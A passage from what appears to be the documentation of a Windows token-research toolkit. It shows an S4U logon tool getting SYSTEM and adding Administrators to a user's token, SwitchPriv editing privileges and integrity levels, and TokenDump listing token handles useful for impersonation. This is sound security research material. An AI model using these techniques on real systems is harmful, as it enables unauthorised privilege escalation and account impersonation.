  [*] Account : CONTOSO\\jeff\n    [*] SID     : S-1-5-21-3654360273-254804765-2004310818-1105\n    [*] UPN     : jeff@contoso.local\n    [*] Type    : User\n[\u003e] Verifying extra group SID(s).\n[*] BUILTIN\\Administrators (SID : S-1-5-32-544) will be added as a group.\n[*] NT AUTHORITY\\NETWORK SERVICE (SID : S-1-5-20) will be added as a group.\n[\u003e] Trying to get SYSTEM.\n[+] Got SYSTEM privileges.\n[\u003e] Trying to S4U logon.\n[+] S4U logon is successful.\n[\u003e] Trying to create a token assigned process.\nWindows PowerShell\nCopyright (C) Microsoft Corporation. All rights reserved.\n\nTry the new cross-platform PowerShell https://aka.ms/pscore6\n\nPS C:\\Tools\u003e whoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name    SID\n============ =============================================\ncontoso\\jeff S-1-5-21-3654360273-254804765-2004310818-1105\nPS C:\\Tools\u003e whoami /groups\nGROUP INFORMATION\n-----------------\n\nGroup Name                             Type             SID                                           Attributes\n====================================== ================ ============================================= ==================================================\nEveryone                               Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Users                          Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\NETWORK                   Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Authenticated Users       Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\This Organization         Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Administrators                 Alias            S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\NETWORK SERVICE           Well-known group S-1-5-20                                      Mandatory group, Enabled by default, Enabled group\nCONTOSO\\ServerAdmins                   Group            S-1-5-21-3654360273-254804765-2004310818-1103 Mandatory group, Enabled by default, Enabled group\nService asserted
identity              Well-known group S-1-18-2                                      Mandatory group, Enabled by default, Enabled group\nMandatory Label\\System Mandatory Level Label            S-1-16-16384\n```\n\nNote the `Service asserted identity` group (`S-1-18-2`) in the group list above: Windows adds it to tokens produced by an S4U logon, so it marks the token as S4U-derived (tokens from a logon backed by real credentials carry `S-1-18-1`, `Authentication authority asserted identity`, instead). This is a useful check when investigating where a token came from.\n\n\u003e __WARNING__\n\u003e\n\u003e If the target account is unprivileged on the target machine, process creation fails with error `0xC0000142` (`STATUS_DLL_INIT_FAILED`) and the command is not executed.\n\u003e To avoid this problem, add privileged groups as extra groups with the `-e` option.\n\u003e \n\u003e Additionally, some accounts (e.g. `NT SERVICE\\TrustedInstaller`) cannot be specified as an extra group for S4U logon.\n\u003e If such an account is given as an extra group, the S4U logon fails with error `0x00000005` (`ERROR_ACCESS_DENIED`).\n\n\n## SwitchPriv\n\n[Back to Top](#privfu)\n\n[Project](./SwitchPriv)\n\nThis tool enables, disables or removes specific token privileges of a process, and can also change the process' integrity level:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -h\n\nSwitchPriv - Tool to control token privileges.\n\nUsage: SwitchPriv.exe [Options]\n\n        -h, --help      : Displays this help message.\n        -d, --disable   : Specifies token privilege to disable or \"all\".\n        -e, --enable    : Specifies token privilege to enable or \"all\".\n        -f, --filter    : Specifies token privilege you want to remain.\n        -i, --integrity : Specifies integrity level to set in decimal value.\n        -p, --pid       : Specifies the target PID. 
Default specifies PPID.\n        -r, --remove    : Specifies token privilege to remove or \"all\".\n        -s, --search    : Specifies token privilege to search.\n        -g, --get       : Flag to get available privileges for the target process.\n        -l, --list      : Flag to list values for --integrity options.\n        -S, --system    : Flag to run as \"NT AUTHORITY\\SYSTEM\".\n```\n\nTo list the values accepted by the `--integrity` option, run with the `--list` flag:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -l\n\nAvailable values for --integrity option:\n\n    * 0 : UNTRUSTED_MANDATORY_LEVEL\n    * 1 : LOW_MANDATORY_LEVEL\n    * 2 : MEDIUM_MANDATORY_LEVEL\n    * 3 : MEDIUM_PLUS_MANDATORY_LEVEL\n    * 4 : HIGH_MANDATORY_LEVEL\n    * 5 : SYSTEM_MANDATORY_LEVEL\n    * 6 : PROTECTED_MANDATORY_LEVEL\n    * 7 : SECURE_MANDATORY_LEVEL\n\nExample :\n\n    * Lower a specific process' integrity level to Low.\n\n        PS C:\\\u003e .\\SwitchPriv.exe -p 4142 -i 1\n\nProtected and Secure levels should not be available, but are left for research purposes.\n```\n\nThe target process is selected by PID with the `-p` option; the tool must be able to open that process' token from your context (for targets it cannot open, see the `-S` flag below).\nYou can list the privileges present in the target process' token, with their state and the token's integrity level, using the `-g` flag:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n    [*] Target PID   : 9408\n    [*] Process Name : Notepad\n[+] Got 5 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                State\n============================= =========================\nSeShutdownPrivilege           Disabled\nSeChangeNotifyPrivilege       EnabledByDefault, Enabled\nSeUndockPrivilege             Disabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege           Disabled\n\n[*] Integrity Level : Medium Mandatory Level\n[*] Done.\n```\n\nWhen `-p` is not specified, the target is the parent process of SwitchPriv itself, i.e. the shell it was launched from, so you can modify your own shell's token:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe 
-g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n    [*] Target PID   : 6772\n    [*] Process Name : powershell\n[+] Got 5 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                State\n============================= =========================\nSeShutdownPrivilege           Disabled\nSeChangeNotifyPrivilege       EnabledByDefault, Enabled\nSeUndockPrivilege             Disabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege           Disabled\n\n[*] Integrity Level : Medium Mandatory Level\n[*] Done.\n```\n\nThe privilege to control is specified as a case-insensitive substring that matches exactly one of the privileges present in the target process' token (as listed by `-g`). A privilege that is absent from the token cannot be enabled this way: enabling only switches on a privilege the token already holds.\nFor example, to enable `SeUndockPrivilege` for the target process, use the `--enable` option (`und` is enough to identify it):\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n    [*] Target PID   : 9408\n    [*] Process Name : Notepad\n[+] Got 5 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                State\n============================= =========================\nSeShutdownPrivilege           Disabled\nSeChangeNotifyPrivilege       EnabledByDefault, Enabled\nSeUndockPrivilege             Disabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege           Disabled\n\n[*] Integrity Level : Medium Mandatory Level\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -e und\n\n[\u003e] Trying to enable a token privilege.\n    [*] Target PID   : 9408\n    [*] Process Name : Notepad\n[+] SeUndockPrivilege is enabled successfully.\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n    [*] Target PID   : 9408\n    [*] Process Name : Notepad\n[+] Got 5 token privilege(s).\n\nPRIVILEGES 
INFORMATION\n----------------------\n\nPrivilege Name                State\n============================= =========================\nSeShutdownPrivilege           Disabled\nSeChangeNotifyPrivilege       EnabledByDefault, Enabled\nSeUndockPrivilege             Enabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege           Disabled\n\n[*] Integrity Level : Medium Mandatory Level\n[*] Done.\n```\n\nIf the string is ambiguous, i.e. it matches more than one privilege in the token, the tool refuses to act and lists the candidates:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -e se\n\n[\u003e] Trying to enable a token privilege.\n    [*] Target PID   : 9408\n    [*] Process Name : Notepad\n[-] Cannot specify a unique privilege to enable.\n    [*] SeShutdownPrivilege\n    [*] SeChangeNotifyPrivilege\n    [*] SeUndockPrivilege\n    [*] SeIncreaseWorkingSetPrivilege\n    [*] SeTimeZonePrivilege\n[*] Done.\n```\n\nConversely, to disable `SeChangeNotifyPrivilege`, use the `--disable` option:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n    [*] Target PID   : 9408\n    [*] Process Name : Notepad\n[+] Got 5 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                State\n============================= =========================\nSeShutdownPrivilege           Disabled\nSeChangeNotifyPrivilege       EnabledByDefault, Enabled\nSeUndockPrivilege             Enabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege           Disabled\n\n[*] Integrity Level : Medium Mandatory Level\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -d chan\n\n[\u003e] Trying to disable a token privilege.\n    [*] Target PID   : 9408\n    [*] Process Name : Notepad\n[+] SeChangeNotifyPrivilege is disabled successfully.\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -g\n\n[\u003e] Trying to get available token privilege(s) for the target 
process.\n    [*] Target PID   : 9408\n    [*] Process Name : Notepad\n[+] Got 5 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                State\n============================= ==========================\nSeShutdownPrivilege           Disabled\nSeChangeNotifyPrivilege       EnabledByDefault, Disabled\nSeUndockPrivilege             Enabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege           Disabled\n\n[*] Integrity Level : Medium Mandatory Level\n[*] Done.\n```\n\nDisabling leaves the privilege in the token, so it can be enabled again later. To strip a privilege from the token for good, use the `--remove` option; a removed privilege cannot be added back to that token:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n    [*] Target PID   : 9408\n    [*] Process Name : Notepad\n[+] Got 5 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                State\n============================= ==========================\nSeShutdownPrivilege           Disabled\nSeChangeNotifyPrivilege       EnabledByDefault, Disabled\nSeUndockPrivilege             Enabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege           Disabled\n\n[*] Integrity Level : Medium Mandatory Level\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -r inc\n\n[\u003e] Trying to remove a token privilege.\n    [*] Target PID   : 9408\n    [*] Process Name : Notepad\n[+] SeIncreaseWorkingSetPrivilege is removed successfully.\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n    [*] Target PID   : 9408\n    [*] Process Name : Notepad\n[+] Got 4 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name          State\n======================= ==========================\nSeShutdownPrivilege     Disabled\nSeChangeNotifyPrivilege EnabledByDefault, Disabled\nSeUndockPrivilege       Enabled\nSeTimeZonePrivilege     Disabled\n\n[*] Integrity Level 
: Medium Mandatory Level\n[*] Done.\n```\n\nTo test what a single privilege allows, remove every other privilege from the token with the `-f` (filter) option, which keeps only the privilege(s) you name:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n    [*] Target PID   : 4392\n    [*] Process Name : powershell\n[+] Got 5 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                State\n============================= =========================\nSeShutdownPrivilege           Enabled\nSeChangeNotifyPrivilege       EnabledByDefault, Enabled\nSeUndockPrivilege             Enabled\nSeIncreaseWorkingSetPrivilege Enabled\nSeTimeZonePrivilege           Enabled\n\n[*] Integrity Level : Medium Mandatory Level\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -f tim\n\n[\u003e] Trying to remove all token privileges except one.\n    [*] Target PID   : 4392\n    [*] Process Name : powershell\n[\u003e] Trying to remove all privileges except for SeTimeZonePrivilege.\n[+] SeShutdownPrivilege is removed successfully.\n[+] SeChangeNotifyPrivilege is removed successfully.\n[+] SeUndockPrivilege is removed successfully.\n[+] SeIncreaseWorkingSetPrivilege is removed successfully.\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n    [*] Target PID   : 4392\n    [*] Process Name : powershell\n[+] Got 1 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name      State\n=================== =======\nSeTimeZonePrivilege Enabled\n\n[*] Integrity Level : Medium Mandatory Level\n[*] Done.\n```\n\nTo keep more than one privilege, give a comma-separated list; each entry is matched the same way as for `--enable`. Note that `SeChangeNotifyPrivilege` (bypass traverse checking) is removed along with the rest, which can change how path access behaves in the tested process:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 24300 -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n    [*] Target PID   : 24300\n    [*] Process Name : powershell\n[+] Got 24 token 
privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                            State\n========================================= =========================\nSeIncreaseQuotaPrivilege                  Disabled\nSeSecurityPrivilege                       Disabled\nSeTakeOwnershipPrivilege                  Disabled\nSeLoadDriverPrivilege                     Disabled\nSeSystemProfilePrivilege                  Disabled\nSeSystemtimePrivilege                     Disabled\nSeProfileSingleProcessPrivilege           Disabled\nSeIncreaseBasePriorityPrivilege           Disabled\nSeCreatePagefilePrivilege                 Disabled\nSeBackupPrivilege                         Disabled\nSeRestorePrivilege                        Disabled\nSeShutdownPrivilege                       Disabled\nSeDebugPrivilege                          Enabled\nSeSystemEnvironmentPrivilege              Disabled\nSeChangeNotifyPrivilege                   EnabledByDefault, Enabled\nSeRemoteShutdownPrivilege                 Disabled\nSeUndockPrivilege                         Disabled\nSeManageVolumePrivilege                   Disabled\nSeImpersonatePrivilege                    EnabledByDefault, Enabled\nSeCreateGlobalPrivilege                   EnabledByDefault, Enabled\nSeIncreaseWorkingSetPrivilege             Disabled\nSeTimeZonePrivilege                       Disabled\nSeCreateSymbolicLinkPrivilege             Disabled\nSeDelegateSessionUserImpersonatePrivilege Disabled\n\n[*] Integrity Level : High Mandatory Level\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 24300 -f rest,back,deb\n\n[\u003e] Trying to remove all token privileges except one.\n    [*] Target PID   : 24300\n    [*] Process Name : powershell\n[\u003e] Trying to remove privileges other than follows.\n    [*] SeBackupPrivilege\n    [*] SeRestorePrivilege\n    [*] SeDebugPrivilege\n[+] SeIncreaseQuotaPrivilege is removed successfully.\n[+] SeSecurityPrivilege is removed successfully.\n[+] 
SeTakeOwnershipPrivilege is removed successfully.\n[+] SeLoadDriverPrivilege is removed successfully.\n[+] SeSystemProfilePrivilege is removed successfully.\n[+] SeSystemtimePrivilege is removed successfully.\n[+] SeProfileSingleProcessPrivilege is removed successfully.\n[+] SeIncreaseBasePriorityPrivilege is removed successfully.\n[+] SeCreatePagefilePrivilege is removed successfully.\n[+] SeShutdownPrivilege is removed successfully.\n[+] SeSystemEnvironmentPrivilege is removed successfully.\n[+] SeChangeNotifyPrivilege is removed successfully.\n[+] SeRemoteShutdownPrivilege is removed successfully.\n[+] SeUndockPrivilege is removed successfully.\n[+] SeManageVolumePrivilege is removed successfully.\n[+] SeImpersonatePrivilege is removed successfully.\n[+] SeCreateGlobalPrivilege is removed successfully.\n[+] SeIncreaseWorkingSetPrivilege is removed successfully.\n[+] SeTimeZonePrivilege is removed successfully.\n[+] SeCreateSymbolicLinkPrivilege is removed successfully.\n[+] SeDelegateSessionUserImpersonatePrivilege is removed successfully.\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 24300 -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n    [*] Target PID   : 24300\n    [*] Process Name : powershell\n[+] Got 3 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name            State\n========================= ========\nSeBackupPrivilege         Disabled\nSeRestorePrivilege        Disabled\nSeDebugPrivilege          Enabled\n\n[*] Integrity Level : High Mandatory Level\n[*] Done.\n```\n\nTo enable, disable or remove all available token privileges, specify `all` as the value for `--enable`, `--disable` or `--remove` option:\n\n```\nPS C:\\Dev\u003e whoami /priv\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                Description                          State\n============================= ==================================== ========\nSeShutdownPrivilege           
Shut down the system                 Disabled\nSeChangeNotifyPrivilege       Bypass traverse checking             Enabled\nSeUndockPrivilege             Remove computer from docking station Disabled\nSeIncreaseWorkingSetPrivilege Increase a process working set       Disabled\nSeTimeZonePrivilege           Change the time zone                 Disabled\nPS C:\\Dev\u003e .\\SwitchPriv.exe -e all\n\n[\u003e] Trying to enable all token privileges.\n    [*] Target PID   : 6772\n    [*] Process Name : powershell\n[+] SeShutdownPrivilege is enabled successfully.\n[+] SeUndockPrivilege is enabled successfully.\n[+] SeIncreaseWorkingSetPrivilege is enabled successfully.\n[+] SeTimeZonePrivilege is enabled successfully.\n[*] Done.\n\nPS C:\\Dev\u003e whoami /priv\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                Description                          State\n============================= ==================================== =======\nSeShutdownPrivilege           Shut down the system                 Enabled\nSeChangeNotifyPrivilege       Bypass traverse checking             Enabled\nSeUndockPrivilege             Remove computer from docking station Enabled\nSeIncreaseWorkingSetPrivilege Increase a process working set       Enabled\nSeTimeZonePrivilege           Change the time zone                 Enabled\n```\n\nTo find processes whose token holds a specific privilege, use the `-s` option. Processes whose token cannot be opened from your context are reported separately as access denied, so the result is only complete when you can open every process (see the `-S` flag). The example below locates the processes holding `SeCreateTokenPrivilege`, then inspects one of them:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -s createt\n\n[\u003e] Searching processes have SeCreateTokenPrivilege.\n[+] Got 5 process(es).\n    [*] Memory Compression (PID : 2548)\n    [*] smss (PID : 372)\n    [*] lsass (PID : 736)\n    [*] csrss (PID : 584)\n    [*] csrss (PID : 504)\n[*] Access is denied by following 2 process(es).\n    [*] System (PID : 4)\n    [*] Idle (PID : 0)\n[*] Done.\n\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -g -p 2548\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n    [*] Target PID   : 2548\n    [*] Process 
Name : Memory Compression\n[+] Got 31 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                            State\n========================================= =========================\nSeCreateTokenPrivilege                    Disabled\nSeAssignPrimaryTokenPrivilege             Disabled\nSeLockMemoryPrivilege                     EnabledByDefault, Enabled\nSeIncreaseQuotaPrivilege                  Disabled\nSeTcbPrivilege                            EnabledByDefault, Enabled\nSeSecurityPrivilege                       Disabled\nSeTakeOwnershipPrivilege                  Disabled\nSeLoadDriverPrivilege                     Disabled\nSeSystemProfilePrivilege                  EnabledByDefault, Enabled\nSeSystemtimePrivilege                     Disabled\nSeProfileSingleProcessPrivilege           EnabledByDefault, Enabled\nSeIncreaseBasePriorityPrivilege           EnabledByDefault, Enabled\nSeCreatePagefilePrivilege                 EnabledByDefault, Enabled\nSeCreatePermanentPrivilege                EnabledByDefault, Enabled\nSeBackupPrivilege                         Disabled\nSeRestorePrivilege                        Disabled\nSeShutdownPrivilege                       Disabled\nSeDebugPrivilege                          EnabledByDefault, Enabled\nSeAuditPrivilege                          EnabledByDefault, Enabled\nSeSystemEnvironmentPrivilege              Disabled\nSeChangeNotifyPrivilege                   EnabledByDefault, Enabled\nSeUndockPrivilege                         Disabled\nSeManageVolumePrivilege                   Disabled\nSeImpersonatePrivilege                    EnabledByDefault, Enabled\nSeCreateGlobalPrivilege                   EnabledByDefault, Enabled\nSeTrustedCredManAccessPrivilege           Disabled\nSeRelabelPrivilege                        Disabled\nSeIncreaseWorkingSetPrivilege             EnabledByDefault, Enabled\nSeTimeZonePrivilege                       EnabledByDefault, 
Enabled\nSeCreateSymbolicLinkPrivilege             EnabledByDefault, Enabled\nSeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled\n\n[*] Integrity Level : System Mandatory Level\n[*] Done.\n```\n\nTo change the integrity level of the target process' token, use the `--integrity` option with one of the values listed by `--list`. The example below lowers the parent PowerShell from Medium (`S-1-16-8192`) to Low (`S-1-16-4096`), which `whoami /groups` confirms:\n\n```\nPS C:\\Dev\u003e whoami /groups | findstr /i level\nMandatory Label\\Medium Mandatory Level                        Label            S-1-16-8192\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -i 1\n\n[\u003e] Trying to update Integrity Level.\n    [*] Target PID   : 3436\n    [*] Process Name : powershell\n[\u003e] Trying to update Integrity Level to LOW_MANDATORY_LEVEL.\n[+] Integrity Level is updated successfully.\n[*] Done.\n\nPS C:\\Dev\u003e whoami /groups | findstr /i level\nMandatory Label\\Low Mandatory Level                           Label            S-1-16-4096\n```\n\nTo perform any of the above actions as SYSTEM, for example against a process whose token your own account cannot open, set the `-S` flag (`SeDebugPrivilege` and `SeImpersonatePrivilege` are required to obtain the SYSTEM token):\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -g -p 2548 -S\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n    [*] Target PID   : 2548\n    [*] Process Name : Memory Compression\n[\u003e] Trying to get SYSTEM.\n[+] Got SYSTEM privilege.\n[+] Got 31 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                            State\n========================================= =========================\nSeCreateTokenPrivilege                    Disabled\nSeAssignPrimaryTokenPrivilege             Disabled\nSeLockMemoryPrivilege                     EnabledByDefault, Enabled\nSeIncreaseQuotaPrivilege                  Disabled\nSeTcbPrivilege                            EnabledByDefault, Enabled\nSeSecurityPrivilege                       Disabled\nSeTakeOwnershipPrivilege                  Disabled\nSeLoadDriverPrivilege                     Disabled\nSeSystemProfilePrivilege                  EnabledByDefault, 
Enabled\nSeSystemtimePrivilege                     Disabled\nSeProfileSingleProcessPrivilege           EnabledByDefault, Enabled\nSeIncreaseBasePriorityPrivilege           EnabledByDefault, Enabled\nSeCreatePagefilePrivilege                 EnabledByDefault, Enabled\nSeCreatePermanentPrivilege                EnabledByDefault, Enabled\nSeBackupPrivilege                         Disabled\nSeRestorePrivilege                        Disabled\nSeShutdownPrivilege                       Disabled\nSeDebugPrivilege                          EnabledByDefault, Enabled\nSeAuditPrivilege                          EnabledByDefault, Enabled\nSeSystemEnvironmentPrivilege              Disabled\nSeChangeNotifyPrivilege                   EnabledByDefault, Enabled\nSeUndockPrivilege                         Disabled\nSeManageVolumePrivilege                   Disabled\nSeImpersonatePrivilege                    EnabledByDefault, Enabled\nSeCreateGlobalPrivilege                   EnabledByDefault, Enabled\nSeTrustedCredManAccessPrivilege           Disabled\nSeRelabelPrivilege                        Disabled\nSeIncreaseWorkingSetPrivilege             EnabledByDefault, Enabled\nSeTimeZonePrivilege                       EnabledByDefault, Enabled\nSeCreateSymbolicLinkPrivilege             EnabledByDefault, Enabled\nSeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled\n\n[*] Integrity Level : System Mandatory Level\n[*] Done.\n```\n\n\n## TokenDump\n\n[Back to Top](#privfu)\n\n[Project](./TokenDump)\n\n\nThis tool inspects token information: a brief listing of the primary tokens of all processes, of impersonating threads or of the token handles each process holds, and a verbose dump of a single token:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -h\n\nTokenDump - Tool to dump process token information.\n\nUsage: TokenDump.exe [Options]\n\n        -h, --help    : Displays this help message.\n        -d, --debug   : Flag to enable SeDebugPrivilege.\n        -e, --enum    : Flag to enumerate brief information tokens for processes or handles.\n        -T, --thread  : Flag to scan thread tokens. 
Use with -e option.\n        -H, --handle  : Flag to scan token handles. Use with -e option.\n        -s, --scan    : Flag to get verbose information for a specific process, thread or handle.\n        -a, --account : Specifies account name filter string. Use with -e flag.\n        -p, --pid     : Specifies a target PID in decimal format. Use with -s flag, or -e and -H flag.\n        -t, --tid     : Specifies a target TID in decimal format. Use with -s flag and -p option.\n        -v, --value   : Specifies a token handle value in hex format. Use with -s flag and -p option.\n```\n\nTo enumerate the primary token of every process, just set the `-e` flag:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -e\n\n[\u003e] Trying to enumerate process token.\n\n PID Session Process Name                Token User                   Integrity Restricted AppContainer\n==== ======= =========================== ============================ ========= ========== ============\n5004       0 svchost.exe                 NT AUTHORITY\\SYSTEM          System    False      False\n3728       0 conhost.exe                 NT AUTHORITY\\SYSTEM          System    False      False\n\n--snip--\n\n6712       0 svchost.exe                 NT AUTHORITY\\LOCAL SERVICE   System    False      False\n1972       0 svchost.exe                 NT AUTHORITY\\SYSTEM          System    False      False\n\n[+] Got 129 token information.\n[*] Found 7 account(s).\n    [*] NT AUTHORITY\\SYSTEM\n    [*] dev22h2\\user\n    [*] NT AUTHORITY\\LOCAL SERVICE\n    [*] NT AUTHORITY\\NETWORK SERVICE\n    [*] Font Driver Host\\UMFD-0\n    [*] Font Driver Host\\UMFD-1\n    [*] Window Manager\\DWM-1\n[*] Done.\n```\n\nTo enable `SeDebugPrivilege` before enumerating, set the `-d` flag as well. With it enabled the tool can open processes running as other accounts regardless of their DACL, so the listing is more complete; run it from an elevated prompt, since the privilege must be present in your token before it can be enabled:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -e -d\n\n[\u003e] Trying to enable SeDebugPrivilege.\n[+] SeDebugPrivilege is enabled successfully.\n[\u003e] Trying to enumerate process token.\n\n PID Session Process Name                Token User                   Integrity 
Restricted AppContainer\n==== ======= =========================== ============================ ========= ========== ============\n5004       0 svchost.exe                 NT AUTHORITY\\SYSTEM          System    False      False\n3728       0 conhost.exe                 NT AUTHORITY\\SYSTEM          System    False      False\n3740       0 vm3dservice.exe             NT AUTHORITY\\SYSTEM          System    False      False\n\n--snip--\n```\n\nWhen the `-H` flag is set together with `-e`, TokenDump enumerates the token handles held by each process, with the token type and impersonation level of each. Handles to tokens of other users (such as the `dev22h2\\user` tokens held by `winlogon.exe` below) are the interesting ones when investigating token theft, since whoever can reach such a handle with sufficient access can impersonate that user:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -e -H -d\n\n[\u003e] Trying to enable SeDebugPrivilege.\n[+] SeDebugPrivilege is enabled successfully.\n[\u003e] Trying to enumerate token handles.\n\n[Token Handle(s) - winlogon.exe (PID: 704)]\n\nHandle Session Token User          Integrity Restricted AppContainer Token Type    Impersonation Level\n====== ======= =================== ========= ========== ============ ============= ===================\n 0x2B0       1 NT AUTHORITY\\SYSTEM System    False      False        Primary       Anonymous\n 0x2B4       1 NT AUTHORITY\\SYSTEM System    False      False        Primary       Anonymous\n 0x38C       1 dev22h2\\user        Medium    False      False        Primary       Impersonation\n\n--snip--\n\n[Token Handle(s) - svchost.exe (PID: 3272)]\n\nHandle Session Token User                 Integrity Restricted AppContainer Token Type Impersonation Level\n====== ======= ========================== ========= ========== ============ ========== ===================\n 0x168       0 NT AUTHORITY\\LOCAL SERVICE System    False      False        Primary    Anonymous\n\n[+] Got 819 handle(s).\n[*] Found 8 account(s).\n    [*] NT AUTHORITY\\SYSTEM\n    [*] dev22h2\\user\n    [*] Font Driver Host\\UMFD-1\n    [*] Font Driver Host\\UMFD-0\n    [*] NT AUTHORITY\\NETWORK SERVICE\n    [*] Window Manager\\DWM-1\n    [*] NT AUTHORITY\\LOCAL SERVICE\n    [*] NT AUTHORITY\\ANONYMOUS LOGON\n[*] Done.\n```\n\n
When a PID is given with the `-p` option, TokenDump enumerates only that process' handles. In the `winlogon.exe` example below, the Medium and High integrity primary tokens for the same user are consistent with a UAC split token, i.e. the filtered token and its elevated linked token:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -e -H -d -p 704\n\n[\u003e] Trying to enable SeDebugPrivilege.\n[+] SeDebugPrivilege is enabled successfully.\n[\u003e] Trying to enumerate token handles.\n\n[Token Handle(s) - winlogon.exe (PID: 704)]\n\nHandle Session Token User          Integrity Restricted AppContainer Token Type    Impersonation Level\n====== ======= =================== ========= ========== ============ ============= ===================\n 0x2B0       1 NT AUTHORITY\\SYSTEM System    False      False        Primary       Anonymous\n 0x2B4       1 NT AUTHORITY\\SYSTEM System    False      False        Primary       Anonymous\n 0x38C       1 dev22h2\\user        Medium    False      False        Primary       Impersonation\n 0x398       1 dev22h2\\user        High      False      False        Primary       Identification\n 0x3C4       1 dev22h2\\user        Medium    False      False        Impersonation Impersonation\n 0x3C8       1 dev22h2\\user        Medium    False      False        Impersonation Impersonation\n 0x3D0       1 dev22h2\\user        Medium    False      False        Impersonation Impersonation\n 0x3D4       1 dev22h2\\user        Medium    False      False        Impersonation Impersonation\n\n[+] Got 8 handle(s).\n[*] Found 2 account(s).\n    [*] NT AUTHORITY\\SYSTEM\n    [*] dev22h2\\user\n[*] Done.\n```\n\nTo enumerate threads that are currently impersonating, i.e. threads with an impersonation token set, use the `-T` flag together with `-e`:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -e -T -d\n\n[\u003e] Trying to enable SeDebugPrivilege.\n[+] SeDebugPrivilege is enabled successfully.\n[\u003e] Trying to enumerate impersonated threads.\n\n PID  TID Session Process Name Token User          Integrity Impersonation Level\n==== ==== ======= ============ =================== ========= ===================\n1952 2000       0 svchost.exe  NT AUTHORITY\\SYSTEM System    Impersonation\n1952 2300       0 svchost.exe  NT 
